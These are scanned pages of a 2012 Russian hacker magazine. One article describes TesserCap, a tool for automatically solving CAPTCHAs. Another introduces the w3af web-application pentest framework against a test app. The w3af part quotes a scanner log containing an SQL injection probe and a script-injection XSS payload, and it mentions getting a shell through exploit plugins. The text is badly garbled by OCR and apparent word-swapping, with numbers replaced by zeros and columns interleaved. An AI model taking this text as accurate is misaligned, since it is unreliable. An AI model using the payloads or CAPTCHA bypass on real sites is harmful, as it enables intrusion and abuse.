if (invertRed is true) new red=255 - current red if (invertBlue is true) new Ыuе=255 - current Ыuе if ( inve r tGree n is true) new green=255 - current green

компонентов каждого пикселя на зависимости от значения во нива выполняются следующие

действия:

0.

САРТСНА-изображениям равным образом спустя время активируют загружаемые со временем включения опции ЕпаЫе

lmage

Pгepгocessiпg, проходят предвари­

Если спица в колеснице равняется

-1, согласующий

цветовой устройство никак не меняе т ся.

ки изображений как один тестируемым этот часть . Все СА РТ СНА-изображения,

057

lот -1 перед 0551 возможных значений. Для RGВ­

0.

Если роль безграмотный эквивалентно

-1,

целое найденные

компоненты указанного цвета !красный, зе­

Инверсия одного или — или нескольких цветов

леный другими словами синий] меняю т ся на соответствии

постоянно открывает новые потенциал для того про­

веркитестируемого САРТСНА-изображения.

вместе с введенным во полина значением. Значение О удаляет компонент, роль

тельную обработку равным образом еще поэтому передаются в ОСR-систему Tesseгact интересах извлечения

Этап

0. Изменение

цвета

текста.

На данном шаге не запрещается переработать цветовые

055 устанав­

ливает его максимальную ясность

да т. д.

Этап

0. Градация

серого !Шкала яркости)

На третьем буква п е всё-таки изображения конверти ­ руются на изображения на градациях серого . Это Chop"""' O Activ.ste

01 <· 0 t~

унарный неизменный сия п п реобразо ­ вания изображений, ко т орый н ельзя про­ пустить. В зависимости через выбранной кнопки выполняется одно с следующих действий, связанных вместе с цветовой составляющей каждого пикселя:

Aveгage -71Red + Gгееп + Bluel/3 . 2. Humaп -7 00.21 • Red + 0.71 • Gгееп + 0.07 • Bluel . 3. Aveгage of minimum апd maximum соlог componeпts -?IMiпimum IRed + Gгееп + Blue) + Maximum IRed + Gгееп + Blue ll /2 . 4. Miпimum -7 Miпimum IRed + Gгeen + Bluel. 5. Maximum -7 Maximum IRed + Gгееп + Bluel.

0.

В зависимости через интенсивности да рас­

пределения цветовой составляющей САРТСНА любой с сих филыров может улучшить @ Smooth Mack 0

0

Q S~M~2

Q S~~M~2

Sh.vpen Ммk 0

0

извлекаемое портрет пользу кого дальнейшей

Sharpen Ммk З

Q S~M~S

0

обработки . Этап

0.

Сглаживание да нелюбезность

Чтобы запутать отрывок текста И з мен е ни е объединение м ех подле изменении различны х д равно апазонов цветового з начения 14 ко сел ей на сторону белого или — или черного

с САРТСНА-изображе н ий, на них д обавляют

Х АКЕР

03 /158/2012


П рове р ка в п ро чн ос ть

гук во форме однопиксельных не ведь — не то многопик­

выдается просчет равно образина невыгодный быть меняе т ся.

Этап

сельных точек, посторонних линий равно пре­

П ри выборе фиксированной маски кнопку

Это т фуй льт р строит г рафик з а висимости з н аче­

етранетвенных искажений . При сглаживании

Save Mask

пускать в ход невыгодный требуется.

0. Вводим

Этап

фильтры

Н а этом этапе обработки изображения е г относительно

Passes

Cutoff.

В числовом нива

долженствует указать, почем крат нужно

ния уров н моя персона посредственно г насчёт касательно т частоты

(cutoff) встречаемос т равным образом

работы что до т секаю щ его фу льт ра п оказа н ни но

устранения которого дальше используются

иначе

Настройка отсечения

да предлагае т выбрат ь отрубание . П ри нц равным образом п

изображения возрастает нечаянный шум, про

Bucket

0.

оттенки серого

во п сеяние д очес д е :

пиксели могут фигурировать окрашены на укладистый

приложить с~ответствующую маску изобра­

круг оттенков серого. Этот фильтр ото­

жения пред переходом в ниженазванный этап.

бражает расположение градаций серого

Давай рассмотрим компоненты фильтра интересах

на

сглаживания равно повышения резкости. Доступ­

пикселей, окрашенных на оттенки серого

ны двоечка в виде масок изображения:

на диапазоне с О давно

00 баке т ахти [Ьuсkеt)/диапазонах. П ро ц ен т 12,

указан на ба кете О,

if (pi xe l 's gr ays cal e value <=Cutoff ) pixel graysca l e val ue=( е OR 055) - > во зави со им относительно сти, что касается т т по отношению го на правах а моя персона опция выбра н а (<=и ли=> : Set Every Pi xel with valu e <=/=> Th r eshold t o е. Rema i ning t o 055 )

Фиксированные маски. По умолчанию

франшиза пикселей, окрашенных на что касается тт енки

TesseгCap имеет цифра в особенности популяр­

заурядно г что до во диапазоне с

ных масок изображения. Эти маски могут

украшать вид либо умножать

с следующих действий чтобы каждого диа­

ние пикселей САР Т С Н А сообразно цвета м равно п омо г ае т

нелюбезность [преобразование Лапласа). Из­

пазона значений, соо т ветствующих оттенкам

спровадить п омехи не без; через отсе ч ения з н а ч е­

менения отображаются зараз но позднее вы­

серого:

ний уро вн мы серого .

бора маски из через соответствующих

0. Остави т ь безо измене н ия [Leave As ls). 2. Заменить белым [White). 3. Заменить черным [Biack).

Этап

кнопок.

Пользовательские маски изображения.

03

прежде

05,-

на ба кете

т. д. Пользователь может наметить одно

0: Обтесывание (choppiпg)

После применения от глаживаю щ е г о, отсекаю­

ще г о,

Юзертакже может настроить пользова­ тельские маски обработки изображений,

График показывает п что касается д роб н ое рас пр е д е л е ­

Бла г одаря сим оп ц иям не запрещается контроли­

bucket-

равно д ругих гадость л ьтро на САР Т С Н А ­

изображе н ия всё е щ е могут уклад ь вслед за ш у м ле н ы

вводя значения на числовые полина равным образом нажи­

ровать небо и земля диапазоны оттенков се­

однопиксельными alias целый ряд п иксе л ьными

мая кнопку

рого, а равным образом сокращать/удалять шум, меняя

точками, посторонними линиями равным образом п реетран ­

оттенки серого на сторону белого либо черного.

етвенными искажениями . П рин ц да п рабо т ы

Save Mask . Если

сложность коэф­

фициентов во сих окошках не так нуля,

' J •' '. /

МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ:

КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ


PCZONE РАСПОЗНАЕМ КАПЧИ

фильтра обтесывания зак л ючается на следую­

меняет его сила уровня серого новым,

щем: когда контингент смежных пикселей,

на правах показано вниз во псевдокоде. Инверсия

окрашенных во настоящий оттеночек серого, мен ь ше

серого проводится для того подгонки изображе­

этой утилиты, равно сегодня недурственно было бы про­

величины на числовом поле, фильтр обтесы на а­

ния лещадь ц во етовые настройки ОСR-системы.

проводить собеседование какую-нибудь капчу в прочность.

ния п чалтык во аивает им з н аче н ие О [ ч ерный ! тож

055 [белый! п по отношению на ыбору п что касается л ьзователя. П ри э т ом САР Т С Н А анализируется в духе во горизонталь­ ном, этак равным образом во вертикал ь ном направлении.

Ну зачем ж, пожалуй, наша сестра рассмотрели постоянно опции

Предлагаю для того примера позаимствовать нарост говорят xakep.гu.

for(eac h pi xel i n САРТ С НА ) new grayscale value=255 - current graysc al e value

Итак, запускаем утилиту равным образом шагом марш нате сайт журнала . Видим перечень свежих новостей, за­ ходим на первую попавшуюся да пролистываем

по места, идеже позволительно отбросить близкий коммента­ Этап

0: Изменение

ширины объем .

Этап

00: Проверка

распознавания капчи

рий. Ага, коммент что-то около легко безвыгодный прикинуть [еще бы, а ведь бы давным-давно уж всё эаспамилиl- нужно

Как у тв ерж д ает пишущий сии строки ути л да т ы, на ходе

Цель данного этапа - уполномочить предвари­

п ерво н ачаль н ых равно сс л е д ова н ий равно разра­

тель н по части обработанное САРТС Н А-изображение

водворять капчу. Н у который ж, проверим, допускается

ботки TesseгCap некто тысячекратно отмечал,

ОСR-системе интересах распознавания. Кнопка

ли сие автоматизировать . Копируем

что, рано или поздно САРТСНА-изображения имеют

Solve

беретик икона впоследствии фильтра

URL

картинки да вставляем его на адресную строку

толстую граничную линию равным образом ее краска отлича ­

инверсии серого, отправляет во ОСR-систему

TesseгCap . Указываем, что такое? нужно использовать

ется ото основного фона САРТСНА, иные

интересах извлечения текста да отображает воз­

капч, да нажимаем Staгt . Программа безответно

вращенный молитва во графическом интер­

загрузила

Д анный фильтр п редназ н ачен к обрабо т ки

системы

фейсе. Если различенный машинопись совпадает

познать. К сожалению, до этого времени капчи оказались

OCR

безвыгодный могут рас п ознать текст.

02

02

картинок да попыталась их рас­

граничных линий да их изменения. Граничные

не без; текстом нате капче, значит, наша сестра согласно правилам

либо невыгодный распознаны, относительно нежели свидетельствует

очертания не без; шириной, которая указана на число­

задали фильтр для того предварительной об­

титул

вом поле, окрашиваются на агатовый другими словами смерть

работки. Теперь дозволяется перепрыгнуть в вкладку

неправильно. В общем, неудивительно, где-то

за выбору пользователя.

опций да влить опцию предварительной

как бы посторонние шумы равно искажения далеко не были

обработки [ЕnаЫе

удалены. Этим наша сестра в тот же миг равным образом займемся . Жмем

Этап

0: Инверсия

серого оттенка

Это т фуй! л ьтр п роходит каж ды й пиксель да начинать

lmage Pгepгocessiпgl с целью

-Failed-

по-под ними, либо распознаны

обработки всех последующих загруженных

правой кнопкой мыши для одну изо

капч.

женных картинок равно отправляем ее на систему

02

загру­

МИНЗДРАВСОЦРАЗВИ1ИЯ РОССИИ ПР~ДУ


Пр оверка бери пр в рассуждении чн волос

nредварительной обработки

[Send То lmage

Ргергосеssог]. Внимательно рассмотрев весь

ЗАКЛЮЧЕНИЕ

В конечном итоге, как бы ваш покорнейший слуга ни бился, обычно

САРТСНА - изображения являются одним

разнюхать нарост говорят у меня в такой мере да никак не получилось .

с самых эффективных механизмов соответственно защите

ры, вследствие чего айда получай вкладку опций да указы ­

Пришло сь производить опыты со pasteЬin.

веб -приложе ний через автоматизированного за­

ваем, что-нибудь признавать нужно исключительно цифры

com,

[Сhагасtег

02

капч, видим , что такое? они содержат лишь циф­

Это, на правах видишь, совер шенно неверно.

которые без участия проблем посчастливилось рас­

полнения форм. Однако слабые капчи смо г ут

Set; Numeгics]. Теп ерь можно п е реходить держи вкладку lmage Pгepгocessing

познать. Но даже если твоя милость окажешься уси дчивее

защити ть с случайных роботов да неграмотный устоят

да терпеливее да сумеешь унаследовать кор­

на пороге целенаправленными попытками их

пользу кого настройки фильтров. Сразу скажу, что-то

ректное разнюхивание капч вместе с xakep.гu, ведь

решить. Как равным образом криптографические алгоритмы,

п в рассуждении игравшись со первыми тремя фильтрами

одновременно заходи бери вкладку опций да включай

САРТСНА-изображения, тщательно проте­

[ << Инверсия цвета>>, <<Изме нение цвета >>,

пре дв арительную обработку изображений

стированные равно обес п ечи на ающие вас сокий уро­

<< Градация бездарно г насчёт » ] ваш покорный слуга отнюдь не увидел никакого по­

[ЕnаЫе

lmage Pгepгocessing]. Затем пере ходи

вень безопасности, являются самым лучшим

ложительного эффекта, посему оставил тама

для

и, кликнув получай Staгt, загружай свежую

способом защиты. На основе статистики,

всё за дефолту. Я выбрал маску

порцию капч, которые в настоящее время будут пред­

которую привел композитор программы, мы выбрал

варительно выделываться твоим филь­

пользу кого своих п роектов гeCaptcha да буд у реко­

Smooth Mask

установил величина ради ходов равным

Main

тром. П осле того, как бы пакет отработает,

мендова ть ее во всем своим друзьям- симпатия ока ­

залась самой стойкой изо протес т ированных.

которых меньше, нужно найти на О, а те,

оставить корректно/некорректно распознан­ ные капчи [кнопки Магk as Соггесt/Магk as l nCoггect] . С сего момента дозволительно просма­

которых больше, во

тривать сво дн ую статистику сообразно распознава­

полуавтоматизированное уступка САРТС Н А.

нию со через

Через особливый

одному. Фильтр Gгayscale

buckets

ваш покорнейший слуга пропустил

да перешел моментально для настройке отсечения . Вы­ б рал достоинство

054

равно указал, почто те пиксел и,

055.

Чтобы отделаться

по отношению т оставшихся точек, включил

chopping

равным образом из­

Show Statistics . В

общем-то ,

В любом случае невыгодный от тоит забы вать , что-то на Сети есть нема ло сервисов, которые предлагают

API

твоя милость передаешь серви­

сие нестандартный отзыв относительно защищенности праздник

су рисунок , а оный путем непродолжитель ­

фильтр заключать в себе отнюдь не было смысла, отчего автор этих строк

иначе говоря отличный САРТСНА. Если есть смысл альтернатива относительно вы­

ное эпоха кайфовый звра щает уступка . Решает ка пч у

вместе с разу нажал в

боре того другими словами др угого решения, в таком случае со помо­

жизненный засранец [например, изо Китая ] , п о­

щью TesseгCap полностью дозволяется скоротать свое

лучая вслед за сие свою копеечку. Ту т поуже дрянной

собственное тестирование.

защиты отсутствует : ]. ::::к:

менил ширин у объем накануне

00. Последний

Solve.

На капче у меня было число н в отношении список распознала его

014945, как 011435.

Содержание во дыме сигареты: смолы - 0; 0 мг, никотина- 0,4; 0, 0 мг, С О- 0; 0 мг

0Р~ЖДА~Т: КУР~НИ~ ВР~ДИТ ВАШ~МУ ЗДОРОВЬЮ


PCZONE

Тара не без; Иващен ко

loxdeflaoxdef.info] ·

~-

v

ФРЕИМВОРК

[!]·

чтобы веб-пентестера

·~

Ин форм ац да я пред ст авп е н а и из кл юч равным образом т ел ьно для относительно з н ак касательно м ления .

Редакция безвыгодный нес е т отв е тственности

ТЕСТИРУЕМ БЕЗОПАСНОСТЬ ВЕБ-ПРИЛОЖЕНИЯ С ПОМОЩЬЮ WЗAF

из-за е е использование в прот равным образом в з а для что до н ны х

целя х. nодобные

-де йствия вл ек у т з а вместе с о й уголовно е преследование .

Прое для т wЗaf со равным образом льно выделяется сред да мног их други х инструм е нтов про ис вместе с ледования

безопасности веб-приложени й. Это

малограмотный обычны й автосканер не без; черство забитым функционалом , а фреймвор к, позволяющи й

да спользовать сильнее сотни различных плагинов для исследования сайта, поиска уязвимасте й и их последующей эксплуатации . ЧТО ТАКОЕ WЗAF? Совреме н ные веб-приложе н равно ваш покорный слуга сделано недостаточно нежели похожи н а своих п ред­ ш естве н нико во , ко т гам ы е бы л да во хождение у е щ е п ваш покорнейший слуга т ь л ет н аза д . Они стано ­ вятся всё сильнее популярными, ис п ользуют значительно свыше техно­ логий, зачем увеличивает достижимый градиент атаки, обрабатывают всё больше разной информации, в фолиант числе финансовые равно переанальные данные . Чтобы сбавить риски, наша сестра можем насадить процес со безоnас­ ной разработки п рограммна го обеспечения, важным эт апом которого является дерево т иро во ание безопас н ости. Услов н по части говоря , позволяется выде­ лить четное число ыре во ида тестиро во ания безопасности веб - приложения :

0. Автоматизированноесканированиенауязвимос т и. 2. Ручноетестированиебезопасностиlпентестин~ . 3. Статическийанализкода. 4. Аудит кода.

-

n

Сегодня пишущий эти строки хочу рассказа т ь насчёт проекте wЗaf lwЗaf. oгg l . Это фреймворк !Web Applicatioп Attack and Audit F гamewoгkl , некоторый может составлять исполь зова н для для тестирования бе зо пасности на еб-приложения

первых двух видов тестирования. Автором сего открытого проекта является Андреас Рианчо изо Аргентины. Сейчас редакция разрабаты­ вается nреимущественно им да мелкий гру nn ой контрибьюторов

со весь г насчёт мира, во ко т орую ввод ит равно ав т гам сих строк

,._ ~.ы. jNII'amtWI axllt

ним опять же принимают активное отношение такие известные компании,

·-·""""""'

. ..... ..,"",_ Plugin

..

N:Jt.ie

-.

:1. В работе бери д

Thll ptugln 0nr:ts СIОМ 0118 SCI\ping (XSS) 'o'lllntl'.ьllllin.

в качестве кого

TolndXSS~twpluglnwllstl'lda . . ofi81161C:11pttmoJD8\II!Yp61."....., andsнrctlforfllllnpulln . hlltlpCIIIИ. Тhepaiiiii'IМtr "~c:onev.nsltoepkqniOIIOAIIIO.Ifi~IOhwetlfC)pliedon 81'1d81h.,..;l, requnt .. P'Qt$4!CI'in~bflolqu:twrцnOtiOICII«ЬOttlminllhoWI'I\CII'I)'

~НinQS .,I иntlarmylr1к'ion~

~

Rapid7

равно Я ндекс! Фреймворк написан в

Python,

который, в качестве кого твоя милость

знаешь, является << языком от батарейками>>. Батарейки wЗ af- зто его расширения, которы х набралось сейчас пуще сотни. Это, конечно, еще не

Mozilla

Fiгefox, однако ранее достанет мощное оружие .

A" tfl'lliiRtOOtl r.1 <,« '*"IFilt

Q

.Z II.Я.

,_,

~ l!miFill

tМckSIONd

0:3

011111'A:18f01CМC~~s l 0

в отношении

0 Oi

КАК УСТРОЕН WЗAF? Фреймворк wЗaf состоит с двух важных частей: ядра равно плагинов.

Главное пространство wЗaf

Ядро запускает первый nроцесс да координир ует работу плагинов ,

ХАКЕР

03/158/2012


Фреймворк чтобы пенте от т скоморох

,·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- - ·- ·- ·- ·- -, - · - · - · - · - · - · - · - · - · - · - ·,

: (Discivery)

ко во еб -nрил оже нию равным образом его ответах . Если что касается nять пров yes ти аналогию

.

со скопом

(вrutforce) ~ : •

0

UNI X, сие в действительности эквива л ен ттекс т ово го nотокового sed, н относительно ужедля НТТР-транз акций. Заме шерстинка умереть и никак не встать всех от­

редактора

ветах hidd en -n oля получи и распишись обы чны етекстовые? П ожалуйс т а! Еvаsiоn -nлагины исnользуются с целью обхо д а nростых nравил раз­

0.

личных 005. Хо чеш ь nодальше сохраниться незамече нным nр равно nр о­ ведении очередного nентеста веб -nр иложения? То гда исnользуй

что-нибудь с сего набора.

0.

Оutрut-nлагины выn ол няют простую миссию: формируют во удо бо­ читаемом виде насчёт т четы по отношению результатах работы wЗaf. Вы бирай, что тебе чище nодходит-<<nравославныЙ >> текстовый платье т не так — не то

И нфо рмаци что касается нный nоток во wЗaf

<<э нтерn райз н ый>>

POF,-

иначе nо-быстрому наnиши побольше nод­

расхаживающий на твоих нужд nлагин . а приблизительно а обме н инфо рмации в среде ними. Плаг ины, во от во ою очередь,

0.

Аuth-nлагины берут получи и распишись себя вполне nроцесс уnравления nоль­

находятуязвимости да п озволяют пр оэкс пл уа тировать их. Ч ерез главное

зо на ательской сессией: авторизируются во веб-nриложении,

плагины обмениваются информацией, ко прим еру, по части найденн ых запро­

nроверяют, так чтобы конференция оставалась выметайся дн ой, да выnолняют во

сах с целью фаззинга. В ко аче со тве ц ентрального хранилища информации

конце сканирования аккуратный количество продукции изо веб-nриложения. Это

выст у паеттак называемая «б аза з наний >>.

что до ч е нь удовлетворительно обно. Ещ ё со на сем н е давн насчёт никак не б ыл касательно удоб н ой потенциал

Слово «фрейм ворк >> во названии разработки у п отребляется никак не слу ­ чайно . WЗaf пр е д оста вля ет платформ у, на ведь момент наравне полный функцио­

просмотреть nользовательские части веб-приложений, так сделал ть те, сколько держи хо дятся вслед за авторизацией. Да , не возбраняется было выделить wЗaf

звонкая монета интересах пентеста реализован на разных плагина х. Для каждого нового

исnользовать nредварит ельно nолученную равным образом з браузера куку, н относительно

ск анир ова ния твоя милость можешь сортировать лишь нужные тебе аддоны,

сие н е самый пенис обный сnособ. Сейчас на составе wЗaf всего делов одиночный

комбинируя их. Плагин каж дого типа, котор ы х на общей сложности на­

аuth -n лагин, да симпатия nодойдёт пользу кого большинства случае в. Д а да невыгодный

счи тываетс ваш покорнейший слуга восемь, отвечает из-за действие относительно пр е деленной после дач равным образом .

забывай, ась? наш брат имеем д ело со фреймворком, да не запрещается наnисать

0. Плагины на поиска на вал можны хточек на хо верно на пр иложение !или та ко

экий nлагин nрактически для того первый встречный сложение ауте нт ификации:

называемые disсоvегу-плагиныl собирают фигура , ссылки да общо

SMS, токены

да т.n . У тебя на руках весь мощь Python!

всё, в чем дело? можетсгенерироватьзапрос для во еб- пр иложению. Та ким об­ ра зо м формируется трынка запросовтестируемого приложения . Хо ­ рошим прим ерам та ко го плагина является образцовый веб-паук ,

Теnерь, при случае автор малограмотный бессчетно разобрались из архитектурой wЗaf, настало

скаются на период е, вследствие ч ему цели , обнаруженные возьми пр е дыду­

промежуток времени у замечать его на д ействии. Сnециа льн касательно интересах д емо н не без; трации автор на­

щем этапе, п в рассуждении падают в во хо д сих а плаг ино на сверху следующем э тап е.

nисал nростое, только оче нь <<вебдва нольное >> nриложение социальной

Этотnроцесс nродолжаетеядатех п что до р, n ока безграмотный довольно д ос тигн ут

наnравленнос т да nод названием ltte г. Да , сие сер во ис пользу кого ведения

лимит, определённый пользу кого режима nои ска цел ей ради фаззинга.

0. Аудит-nлагины исnользуютвывод nлаг инов !то лакомиться т иллюминаторы входа в nриложениеl интересах n оиска у аз многогрешный з во да мастей, коток орые nозволяютосу­ щест витьтакие атаки, какХSS, SQL-инъекция, IR)LFI да пропасть

микроблогов, равно , аз многогрешный по-над еюс ь , возлюбленный ста н е ттаким а nоnулярным, во вкусе его

конечный

040 символами в одно известие стар ши й канделябр т. :1

Те стовое веб-nриложение обладает следую щ ими свойс тв ами:

основано возьми

LAMP ILinux-Apache-M yS QL-PHPI;

имеетфункцию n оиска да обслуживание nрив атных сообщений;

др у ги х.

З.

СКАНИРУЕМ ВЕБ-ПРИЛОЖЕНИЕ

реализованный на виде модуля webSpideг. Оisсоvег у -плагины ради пу­

Gгер-nлагины nросты, так во равно как период очен ь nолезны, во вкусе равно с во ест­

nолноценный достуn для функционалу nриложения nредоставляется

ная UNI Х-ут илита , во чистота которой они бери з ваны . Смысл та кой: чрез

лишь только заре гистрир ованным да авторизова нны м nользователям;

gг ер -nлагин nро хо диткаждая чета НТТР -зап р ос/от вет, на которой nроизводится nоиск интересующей получай из информации !номера

успехи н оис nоль зуетАJАХ;

кре дитны х карт, вн утренни е IР -ад р еса, а др еса элек тронн ой nочты

равно т. n.l. Эти nлагины тоже умеют выискивать учас тки nотенциально

имеет, окаянный nобери, уязвимости!

ХОЛОДНЫЙ ЗАПУСК

onacнoгoJavaScгipt-кoдa, наnример :

Для основные положения нуте nросканир уем наше веб-nриложение сверх авториза­

document.write document.location eval

тр и, да сие n ока небольш ой заумь nр из) да н терфейса:

ции- nросто натравим держи него сканер. В wЗa f глотать неудовлетворительно ! на ообще, уж

gtkUi - графический, основанный нате тулките GTK; consoleUi - хакерекий Ul интересах консольных старожи ловитва !конечно же, от удобным автомобиль после вершением оболочка нд) .

0.

П од об ны е участки заключение многократно создают nредnосылки интересах р еа­

Будем исnользова ть nервый с них. Для заnуска GUI-версии на­

ли вслед за ции атак вида ООМ based XSS l www. owasp . oгg/ i ndex.php/

бираем во консо ли <<./wЗaf_gui>> да видим как бы nо хожее получи и распишись изображен­

DOM Based XSS).

ное в ск р иншоте

Вгu tеfо гсе- nлагины , равно как не грех возбуждать ся, nроизводят nеребор

nр офиль, цель, nлагины равно тулбар. Немн ого расскажу что касается nрофилях.

значений пользу кого ме х анизмов аутентификации НТТР

0. Гл авное

окошечко крата д елено получи и распишись ряд секций:

Basic да интересах обыч­

утнапиштим телосложение чтобы лаги в . Наnример , nлагин foгmlogin автоматически L.

детектир уетформ ы на хо ага до сод е ржани ю во ни х двух nараметро в, о дин изо которых им еетти n passwoгd. По сле об извне ния тако й

стать зараз начинается б р ут.

0.

Аttасk-nлагины nредназначены невыгодный для того nоиска брешей, а к их

экс пл уата ции. Они, как бы равно др угие аддоны, используютобщую базу знаний в рассуждении те ст ируемом nриложении, на ча из тности , они используют ин­ формацию что до найденныхуязвимастях равным образом пытаются их пр оэкс nл уати ­ ровать . Да-д а, собственно сии nлагины могутnомочьдобыть неприкосновенный

••

.......

..

-

..... .. ...._.

ш е лл возьми бажном сервере. ;l

0.

Маnglе-nлаг да ны nозв оляютнал ету изменять что-нибудь на вслед nро сах

ХАКЕР

03/158/2012

Структу р а во еб-nриложения

01,9


PCZONE

.

:::--CniМSiRSaiplngwMЬniC~JI'CГ. UJinO НПP 01181adGE1. f l'leS811diiiiW8S:

"limt=15&\PCSCIFТ~Н")<ISC<Pf .... ть. ml)(thcl'*-wuv Tnisdnt!abllotyateasAU.Ьrowsen.. Тtis.,._~...asloundO'INNCf,IИIWiflid!905.

. ... C/OIIIillla!IID/III~ • • c-•.er~p~orq...._.ы~o~r

.. .. ""&""'"".-- - - Результаты сканирования wЗaf

Использование прокси-утилиты во wЗaf

Как дозволено догадаться, эт по отношению именованные наборы настроек, которые

Suite,

дозволяется мудрить во wЗaf. П в рассуждении сути, сие in i-файлы, во которых твоя милость можешь

«nо льзовательские прокси>> позволяют во реальном времени относительно т слежи­

сберегать nолюбившуюся тебе конфигурацию wЗaf, во книжка числе те­

вать [и ажно изменять! НТТР-трафик среди веб-браузером да веб­

стируемый

сервером. Конечно, сходственный сбруя убирать да во комплекте wЗaf.

URL,

выбранные равно настроенные плагины, саге-настройки

равно многое другое. Например, чтобы сканирования ltteг моя особа создал безыскуственный

либо — либо ажно популярного аддона ко Fiг efox - Таmрег

Data.

Такие

Вернее, такихпроксив нем аж две:

профессия подина названием М у Pгofile, после того подключил во нем disсоvегу­

disсоvегу-плагин spideгMan;

плагины webSpideг да

диалоговый снаряд lnteгcepting Ргоху про ручноготестиро­

gгер-плагинов интересах

вания.

XSS-

pykto [порт знаменитого Nikto держи Pythonl, пару поиска DOM XSS равно мало-мальски плагинов пользу кого поиска

равным образом SQL-инъекций. Ч тобы начить сканирование, нажимаем Staгt

равно ждем порядком минут, временно безграмотный появятся первые результаты. Кста­ ти, да мы со тобой издревле можем приглядывать после действиями wЗaf получи вкладке

Log,

Для наших целей будем пустить в ход spideгMan, который, что ты да я

уж разобрались, представляет внешне disсоvегу-плагин. П опробуем

много во реальном времени выводятся информационные сведения

его во деле. П одключаем плагин на главном окне да запускаем сканиро­

с ядра равно п лагинов. Ход процесса отображается вследствие прогреес - коктейль-бар

вание. В веб-браузере во качестве пр окси прописываем

да оставшиеся идентификаторы.

[я использую про сего адд спирт F охуРгоху про F iгe f ox, по части зво ля ющий

П ример н по части при помощи

минут ввод завершается. Посмотрим,

00

027.0.0.1:44444

легко и просто регулировать проксями равным образом отвлекаться меж ду ними! . SpideгMan

почто посчастливилось раскопать wЗaf. П омимо ошибок конфигурации Апача равно кучи

хорэ запущен предварительно webSpideг, эдак что-то новейший сможет пустить в ход

подозрений в

его результаты . Переключившись бери spideгMan на нашем браузере, н е­

DOM XSS, автосканер обнаружил до некоторой степени XSSI Одна из них, на /i ndex.php, представляет с целью нас независимый интерес, осталь­ ные автор все еще отложим. Плагин Pykto, во свою очередь, обнаружил доступную страни цу статуса Apache да phpinfo-cкpиnт /test.php. Другие плагины установили заголовок равно версию использ уемого веб-сервера

да веб-фреймворка. В нашем случае сие

Linux

Apache/2.2.16 для DeЬian GNU/

равным образом звякало программировани РНР. Др угая полезная фишка, которая

позволяет нам кризис миновал раскумекать структуру веб-приложения,- сие вклад­

ка

URLs из древовидной

картой веб-приложения да ее графическим

представлением. Здесь но дозволено прошляпить безвыездно НТТР-транзакции, сгенер ированные на рамках сканирования.

ПЕНТЕСТИНГ ВЕБ

0.0

Сейчас поуже ни одной живой души безграмотный удивишь играми, г рафическим редактором или видеозвонками вследствие веб-браузер. Неотъемлем ой частью интернета стали веб-приложения, на которых логика выполнения запро граммирована получай стороне клиента не без; активным использовани­

ем JavaScгipt,

AJAX, JSON, HTML5

да др угих названий да аббревиатур.

:1 Такой сочный странность технологий всё более затрудняет автоматизированное испытание безопасности веб-приложений. Прошли былые времена. Это рассказ ранее безграмотный относительно тестировании

как всегда г касательно веб-сайта вместе с множеством страниц вида /aгticle.php?id=68, на ко т орых, на со вою что касается ч е р е дь , питаться много ссылок , форм равно тому п одобного <<мяса>> интересах веб-паука. На жа на , вроде обычно, <Ctгi -U >,

с целью п обглядеть НТМL-к по отношению д , твоя милость увидишь слякоть с огромного куска JavaScгipt равно немножко тра д иционно г относительно

HTML. П одобный

бессчетно полазаем за тестируемому веб-приложению. В L оg-табе видим:

[Mon 00 Мау 0011 02:08:22 АМ MST] spiderMan proxy i s running on 027.0.0.1:44444. Please configure your browser to use these proxy settings and navigate the target sit e. То exit spiderMan plugin please navigate to http:l/127.7.7.7/spiderMan?terminate . [Mon 00 Мау 0011 02 :15 :29 АМ MST] The user is navigating through the spiderMan proxy. [Mon 00 Мау 0011 02:15 : 09 АМ М5Т] Trapped fuzzaЫe requests: [Mon 00 Мау 0011 02:15:29 АМ MST] http ://localhost /i ndex.php 1 Method : GET [Mon 00 Мау 0011 02:15:32 АМ MST] http://localhost/user-info. php 0 Method: GET [Mon 00 Мау 0011 02 : 02:36 АМ MST] SQL injection in а MySQL database was found at: "http://localhost/user-info.php" , using НТТР method GET. The sent data was: "id=d'z"0". Th is vulnerability was found in the request with id 0911. [Mon 00 Мау 0011 02 :27:10 АМ MST] Cross Site Scripting was found at: "http://localhost/index .php", using НТТР method GET . The sent data was: "limit=15&u=<ScRIPT> a=/UzmE/%0Aalert(a.source)</SCRiPT>" . The modified paramete r was "u" . This vulnerability affect s ALL browsers. This vu lne rabi lity was found in the request wit h id 0042.

«сайт» в отношении ч ен ь

неоднократно безвыгодный за зубам веб -п ауку, построенному сообразно классической модели.

Как видать изо лога, чтоб остановить работу spideгMan, необхо­

Это по отношению ко всему жуть интересное указание с целью развития средств

димо перескочить получи особый адрес, потом что webSpideг равно кое-кто

тестирования без шаг сности веб-приложений. Ведь непонятно, в духе

плагины примутся следовать дело. Так , аудит-п лагины обнаружили

во эдакий ситуации автоматизированно обвести полный сайт - встраи­

равным образом ХSS-инъекциюl П ервая дыра, оказавшаяся на правах присест на АJАХ-запросе,

вать полноценные

была упущена закачаешься промежуток времени первого сканирования.

JS

равным образом рендеринг-движки? Использовать подход,

Добавлю немножко насчет эксплуатацию найденных ба го во . WЗaf умеет

сходящийся Selenium/Web Dг iveг? Дл аз многогрешный тестирования п од обных приложений никак не привыкать без специализирован ны х прокси, т аких равно как

050

SQL-

OWASP WebScaгab

равным образом В uгр

выжимать пот некоторые люди ожидание уязвимастей и, для примеру, может предоставить тебе заветн ы й шел л получи и распишись целевой машине. Для эксплуа-

ХАКЕР

03 /158/ 0012


Фреймворк д ля п ентестера

..

тацииобнаруженнойуязвимостинадопростоперетащитьсоотве~ ствующий эксплоит получи вкладке

Exploit

сверху уязвимость. Д ля эксплуа­

тации SQL-инъекций используется жив не буду ему и карточная игра в руки тебе

.

---........

РУЧНОЕ ТЕСТИРОВАНИЕ Отправить НТТР-заnрос во нормальной операционной системе не грех

во конце концов,

-

sqlmap

[sqlmap.sourceforge.netl, вделанный во wЗaf.

со через множества способов: Telпet,

~

cURL, Wget, Python + urll ib,

:1- выбирай, ч т по части вяще в области душе. В wЗaf ради сего

предусмотрены специальные удобные инструменты. П ослать пачку однотипных НТТР-запросов из разными значениями одного изо пара­

